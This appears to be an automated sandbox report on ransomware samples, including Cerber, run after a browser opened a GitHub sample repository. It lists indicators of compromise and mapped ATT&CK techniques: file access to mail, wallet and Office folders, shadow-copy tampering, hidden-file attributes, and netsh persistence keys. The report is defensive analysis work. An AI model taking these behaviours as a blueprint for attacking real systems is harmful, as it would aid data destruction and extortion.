File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\office	cerber.exe
File opened for modification	\??\c:\windows\	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote	cerber.exe
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\documents	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote	cerber.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\word	cerber.exe
File opened for modification	C:\Windows\SysWOW64	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\documents	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird	cerber.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat!	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server	cerber.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4376	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1788	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645113378141218"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	cerber.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1696	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2572	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3136	PING.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4304	WINWORD.EXE
4304	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
3144	chrome.exe
3144	chrome.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
4396	mspaint.exe
4396	mspaint.exe
4736	Ransomware.Unnamed_0.exe
4736	Ransomware.Unnamed_0.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe
196	vbc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3500	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe
Token: SeShutdownPrivilege	4604	chrome.exe
Token: SeCreatePagefilePrivilege	4604	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe
4604	chrome.exe

Suspicious use of SetWindowsHookEx 50 IoCs

pid	Process
3908	131.exe
4656	131.exe
1028	131.exe
1392	131.exe
744	131.exe
3500	OpenWith.exe
2328	OpenWith.exe
4304	WINWORD.EXE
4304	WINWORD.EXE
4304	WINWORD.EXE
4304	WINWORD.EXE
4304	WINWORD.EXE
4304	WINWORD.EXE
4304	WINWORD.EXE
2548	@[email protected]
2548	@[email protected]
848	@[email protected]
848	@[email protected]
4396	mspaint.exe
4396	mspaint.exe
4396	mspaint.exe
4396	mspaint.exe
4804	@[email protected]
4804	@[email protected]
1200	@[email protected]
4452	@[email protected]
3976	@[email protected]
4184	@[email protected]
4452	@[email protected]
4924	@[email protected]
1772	@[email protected]
412	@[email protected]
4156	@[email protected]
2316	@[email protected]
3488	@[email protected]
4688	@[email protected]
1056	@[email protected]
1976	@[email protected]
4724	@[email protected]
4640	@[email protected]
1428	@[email protected]
3768	@[email protected]
5056	@[email protected]
2588	@[email protected]
1696	@[email protected]
1392	@[email protected]
2788	@[email protected]
4920	@[email protected]
4960	@[email protected]
4548	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4604 wrote to memory of 4728	4604	chrome.exe	71
PID 4604 wrote to memory of 4728	4604	chrome.exe	71
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 4048	4604	chrome.exe	73
PID 4604 wrote to memory of 896	4604	chrome.exe	74
PID 4604 wrote to memory of 896	4604	chrome.exe	74
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75
PID 4604 wrote to memory of 1880	4604	chrome.exe	75

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4868	attrib.exe
4260	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/kh4sh3i/Ransomware-Samples
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffcb8cb9758,0x7ffcb8cb9768,0x7ffcb8cb9778
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:2
  2⤵
  PID:4048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2044 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:1880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2856 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:3512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5960 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3112 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:3560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5728 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6076 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=688 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
